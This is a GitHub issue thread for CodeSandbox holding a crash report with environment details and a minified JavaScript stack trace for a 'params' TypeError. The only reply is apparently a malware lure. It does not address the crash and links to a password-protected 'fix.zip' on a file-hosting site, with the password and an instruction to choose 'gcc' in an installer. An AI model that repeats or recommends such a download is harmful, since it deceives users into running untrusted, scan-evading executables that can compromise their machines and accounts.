### ISSUE TITLE
it is not working

### ISSUE THREAD

**Issue by nikki8599** [codesandbox/codesandbox-client#8559]
<h1>💥 Crash Report</h1>

  <h2>What were you trying to accomplish when the crash occurred?</h2>

  > Please use this issue template to describe what you were doing when you encountered this crash. While we are able to fill in some details automatically, it's not always enough to reproduce!

  <h3>Link to sandbox: [link]() (optional)</h3>

  <h3>Crash Details</h3>

  <details>
  <summary>Environment</summary>

  | Browser |  Version  | Operating System | CodeSandbox Version |
  | ------- | --------- | ---------------- | ------------------- |
  | chrome | 127.0.0 | Windows 10           | 22909433c          |

  **Route:**
  https://codesandbox.io/new?utm_source=landingpage

  **Error Code:**
a2b285a895404fac94e6d09ec1225e08

  </details>

  <details>
  <summary>Error Message</summary>

  ```bash
  TypeError: Cannot read properties of undefined (reading 'params')
  TypeError: Cannot read properties of undefined (reading 'params')
    at Ah (https://codesandbox.io/static/js/app.932aed1d3.js:1:763085)
    at la (https://codesandbox.io/static/js/common.85d204171.chunk.js:1:369497)
    at ku (https://codesandbox.io/static/js/common.85d204171.chunk.js:1:414579)
    at vs (https://codesandbox.io/static/js/common.85d204171.chunk.js:1:400183)
    at ps (https://codesandbox.io/static/js/common.85d204171.chunk.js:1:400108)
    at is (https://codesandbox.io/static/js/common.85d204171.chunk.js:1:397456)
    at es (https://codesandbox.io/static/js/common.85d204171.chunk.js:1:394224)
    at Vs (https://codesandbox.io/static/js/common.85d204171.chunk.js:1:422140)
    at https://codesandbox.io/static/js/common.85d204171.chunk.js:1:423373
    at us (https://codesandbox.io/static/js/common.85d204171.chunk.js:1:397804)
    at Ys (https://codesandbox.io/static/js/common.85d204171.chunk.js:1:423358)
    at render (https://codesandbox.io/static/js/common.85d204171.chunk.js:1:425281)
    at https://codesandbox.io/static/js/app.932aed1d3.js:1:772444
  
    in Ah
    in component
    in t
    in t
    in div
    in elements__Content
    in Ne
    in withRouter(Ne)
    in div
    in elements__Container
    in Unknown
    in withRouter()
    in t
    in Unknown
    in De
    in c
    in t
  ```

  </details>

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
